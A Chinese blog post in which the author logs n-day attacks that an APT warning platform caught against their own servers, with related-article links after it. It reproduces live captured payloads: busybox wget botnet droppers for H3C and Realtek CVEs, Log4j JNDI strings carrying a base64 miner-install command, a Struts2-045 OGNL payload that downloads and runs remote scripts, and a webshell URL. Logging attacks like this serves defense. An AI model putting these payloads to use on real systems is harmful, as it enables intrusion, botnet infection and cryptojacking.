APT预警攻击平台截获Nday

已于 2024-04-28 14:51:38 修改
阅读量576 收藏
点赞数 5
分类专栏: 网络安全 文章标签: 网络
于 2024-04-26 08:30:34 首次发布
本文链接:https://blog.csdn.net/qq_43681990/article/details/138204494
版权

APT预警攻击平台截获Nday

2024年4月26日

设备漏洞【漏洞利用】H3C Magic R100任意代码执行漏洞(CVE-2022-34598)

000000100020003000400050006000706F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

在这里插入图片描述

设备漏洞【漏洞利用】Realtek SDK UPnP任意命令注入漏洞(CVE-2021-35394)

000000100020003000400050006000706F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

在这里插入图片描述
在这里插入图片描述

远程代码执行【WEB攻击】Apache Log4j2 任意代码执行漏洞(CVE-2021-44228)

请求内容

authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://colj0qcsjrgk9u7maq0gby3pkekxh7uyo.oast.pro}

外带信息

{"oob": {"domain": "146.59.16.84", "protocol": "tcp"}}

请求:

http://xxx.xxx.xxx.xxx:9092/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')

请求头

Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-

命令注入【WEB攻击】Struts2-045远程命令执行漏洞(CVE-2017-5638)

外带信息

{"oob": {"domain": "87.121.105.232", "protocol": "tcp"},"relation": {"cmd": "curl"}}

请求头

Host: xxx.xx.xxx.xxxx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="(curl -s http://0x5778549c/i || wget -q -O - http://0x5778549c/i || lwp-download http://0x5778549c/i /dev/shm/i) | bash -sh; bash /dev/shm/i; rm -rf /dev/shm/i; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJw== | base64 -d | bash -").(#cmd1="powershell iex(New-Object Net.WebClient).DownloadString('http://87.121.105.232/bin.ps1')").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{"cmd.exe","/c",#cmd1}:{"/bin/bash","-c",#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 0

在这里插入图片描述

信息泄露【WEB攻击】检测到探测服务器config.json文件

这个竟然成功了,经排查,不过没啥影响

http://xxx.xx.xxx.xxx:xxxx/sxxyxxn/common/cap4/template/base/conditions/config.json

命令注入【WEB攻击】检测到系统命令注入攻击(ipconfig)

外带信息

{"relation": {"cmd": "ipconfig"}}

一句话木马

http://xxx.xxx.xxxx.xxxx:xxxx/seeyon/qweasdzxc.jsp?pwd=0&i=ipconfig

响应头

Content-Type: text/html
Content-Length: 537
Date: Sat, 27 Apr 2024 16:32:31 GMT
Connection: close
Server: SY8045

在这里插入图片描述

IT技术伪专家
关注
专栏目录
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 3630
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器、H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
【高危安全通告】微软8月多个漏洞修复
bocco的博客
08-11 1109
安全狗应急响应中心监测到,微软发布了2022年8月的例行安全更新公告,共涉及漏洞数121个,严重级别漏洞17个。本次发布涉及组件有Microsoft Office Outlook、Microsoft Office Excel、Active Directory Domain Services、Windows Kerberos、Windows Storage Spaces Direct、Windows Print Spooler Components、Windows Network File System、Wi
对Log4j活动及其XMRig恶意软件的发现
最新发布
2401_84466224的博客
09-01 1663
Shilpesh Trivedi是一名高级安全研究员,同时也是Uptycs威胁情报团队的leader。
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9799
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
Apache commons-text和Configuration 命令执行CVE-2022-42889/CVE-2022-33980分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-15 2270
Apache commons-text/Configuration 命令执行CVE-2022-42889、CVE-2022-33980分析
致远OA A8 poc中的编码
DaoDivDiFang的博客
06-27 2866
从昨天就有这个poc的信息,其实我对web并不关心。今天又被刷屏了,有的说能利用,有的不能,所以看了下。 给出的poc如下: POST/seeyon/htmlofficeservletHTTP/1.1 Content-Length:1119 User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1) Host:...
关于最近比较火的log4j研究
dongxiexiaoadou的博客
12-24 2387
最近log4j的安全漏洞搞得程序员人心慌慌,宣称为核弹级bug ,然后自己也找时间了解测试了一下。 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件等位置,是程序运行调试追溯问题发生位置的重要手段。 如上,我们自定义username模仿前端请求数据,通过LOGGER.info打印登录的用户名,我们就可以在控制台查看打印的信息。这样我们就可以记录登录的用户。 前端传入什么参数,就会在控制台打印出相应参数。 但当我们传入一些特定参数的时.
APT攻击预警技术方案.doc
12-26
为了防御这种威胁,APT攻击预警技术方案应运而生,旨在及时发现并防范APT攻击。 铱迅(Yxlink)持续性威胁预警系统是专门针对APT攻击的一种解决方案。它利用大数据分析技术,通过监控网络通信数据,探测木马通信...
APT攻击介绍
zjdda的博客
07-16 7270
APT攻击介绍
APT攻击中特种木马的研究与防范.pdf
08-07
因此,需要针对APT攻击的全生命周期进行截断式防御,需要采用全流量深入分析技术手段,如分析0Day/nDay漏洞、特种木马和渗透行为等。 在实际的工程实践中,安全团队需要了解APT攻击的典型过程,包括如何检测木马...
电力系统APT攻击防护深度解析:威胁、策略与案例
这类攻击利用远程漏洞、系统提权、应用解析类漏洞等多种手段,通过0Day/nDay下载者型、控守型、穿透型、窃取型和驻留型远控技术,以及恶意代码如Hash注入、弱口令猜测、域控环境感染、IPC远程管理和Web攻击,实现对...
网络安全系列-二十九: 读《透视APT 赛博空间的高级威胁》笔记
penriver的博客
07-09 2087
最近读了奇安信威胁情报中心 于2019年出版 的《透视APT 赛博空间的高级威胁》,针对APT终于有了一个清晰的理解。 APT攻击,可以突破物理隔离,能获取政府、企业的敏感情报信息和文件,甚至能够对现实世界产生破坏性影响,如一些APT攻击工业控制系统,造成工业系统大范围的破坏。 网络空间已经成为海、陆、空、天之外 的第五空间,APT攻击网络空间面临的严重威胁。这本书介绍了近年来影响较大的APT攻击事件,并对APT手段和工具等进行了详细解读,适合作为网络安全人员的入门读物。...
【记录一次服务器被攻击】-[附带解决方案]
qq_41506710的博客
04-10 7620
当我准备重新构建docker项目时,发现一条某个IP的不正常请求. 日志如下 yudao-ui-admin | 156.219.223.76 - - [09/Apr/2022:16:49:37 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1" 200 10315 "-" "Hello, world" "-" 我的项目是用的开源项目 ruoyi-vue-pro 用的是:docker构建项目
针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析
Fly20141201. 的专栏
05-13 3734
一、事件回放 网络管理员在服务器上通过网络监控软件检测到,有程序在不断向外发包,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发包。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键
收到包含无效cookie的cookie头[(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//54.37.131.XXXX
yeyuningzi的博客
07-22 716
tomcat 日志报:收到包含无效cookie的cookie头[('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//54.37.131.59:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTC的原因以及处理办法
Log4j
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
03-20 220
漏洞成因: log4j支持jndi,可以远程调用rmi和ldap,由于rmi和idap本身存在漏洞,因此log4j就会简介触发rmi和idap。直接跟进到MessagePatternConverter#format方法。调用InitialContext#lookup方法。调用JndiManager#lookup方法。这里获取协议前缀并判断是否在许可的协议内。log4j会记录的请求头。后面又回到了前面的分析。
k8s学习-StatefulSet(模板、更新、扩缩容、删除等)_statefulset模板
2401_84281594的博客
05-02 593
name: web。
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 1295
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IT技术伪专家

你的认可是对我最大的支持!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值